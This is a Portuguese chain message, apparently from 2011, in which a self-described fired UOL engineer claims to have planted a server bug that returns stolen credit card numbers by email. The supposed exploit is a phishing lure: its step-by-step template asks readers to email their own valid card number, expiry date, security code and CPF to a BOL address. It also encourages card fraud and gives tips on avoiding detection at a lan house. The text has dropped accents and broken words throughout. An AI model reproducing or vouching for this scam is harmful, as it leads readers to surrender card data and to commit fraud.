Deixe eu me apresentar, fui engenheira do grupo UOL em at semana passada (15/11/2 011), quando recebi o aviso prvio de demisso por "cortes na empresa", ento procurei um jeito de me vingar... deixei implementada nos servidores do UOL uma maneira muito fcil para obter nmeros de cartes de crditos por e-mail, e todo o estrago causa do, a UOL ser responsabilizada Vou explicar melhor... Sempre que algum faz uma compra na internet com cartes de c rditos, as informaes ficam armazenadas em um servidor de dados, alguns seguros outr os nem tanto! Todos sabemos que brechas de segurana esto ai para serem exploradas. Os servidores da UOL so to inseguros que vrias operaes podem ser feitas sem muitos problemas como: - enviar e-mail sem estar autenticado e pasmem... obter cartes de crditos armazen ados em seus servidores. Eu deixei uma falha em um servidor da UOL (que o mesmo usado pelo BOL), atravs de um e-mail que permite ao hacker enviar para o servidor linhas de cdigo que acaba m gerando um Bug... E aps confirmar umas informaes lhe retorna as informaes de carto de crdito dos ltim clientes ativos. Para que voc receba as informaes corretamente siga as instrues(tem q ue ser do jeito que est aqui): mande um email para: (server.004@bol.com.br) com assunto: accnto0545-cc-ecard-infoE52488-Cod.05 ( isto vai gerar o bug no ser vidor - no use espaos!) Note que na primeira linha da mensagem voc dever colocar as informaes de um carto vli o - porque quando voc mandar o email o servidor com o bug faz uma breve confirmao d e dados do carto ( a nica barreira de segurana dele) - ento no adianta colocar numero de carto falso porque no funciona! Siga o exemplo de como colocar no email: (1 linha) 000003#//0000003## (no mude isso!!!- como uma chave de segurana do servid or) (2 Linha) ( Aqui voc vai colocar as informaes do carto vlido, que voc vai usar pra e ar no servidor - Tem que ser um carto vlido!) Name#: (Nome que est no carto vlido - do jeito que est no carto) Number-e-card#: (Nmero do carto vlido - o mesmo carto que voc colocou o nome) e-card#Grup#: (Nome da empresa do carto vlido - Mastercard, Visa, Credicard, etc) Vili# mm/aa (aqui voce coloca a data de vlidade do carto vlido - mes /ano) cpf###: (nmero do cpf do dono do carto - para verificao do sistema) system0000478547#####03 ( no mude este nmero ) number-segurity##: ( geralmente os 3 ltimos digitos e est atras do carto de crdito.) return in time#:0015 (tempo de retorno das informaes - sugiro que seja 15 min) ret urn#: (coloque entre < > o e-mail que voc deseja que retorne os nmeros dos cartes vl idos) #end#-theend_number### (indica o fechamento de segurana para que suas informaes no f ique no servidor - No se esquea desta linha) Se voce seguir as informaes do modo que est aqui, voc vai receber alguns nmeros de cartes recentemente usados. Esse esquema ideal para voc que quer fazer aquela comprinha em um jogo online =D Quando voc for usar os nmeros recebidos v at uma lan house daquelas bem vagabundas.. . sem camera de segurana para que no fique registrada a sua ida at l e em hiptese algum a use seu computador, para que eles no rastreim o IP do seu computador. No ir demorar muito at que eles corrijam esta falha. Divirta-se! ^-^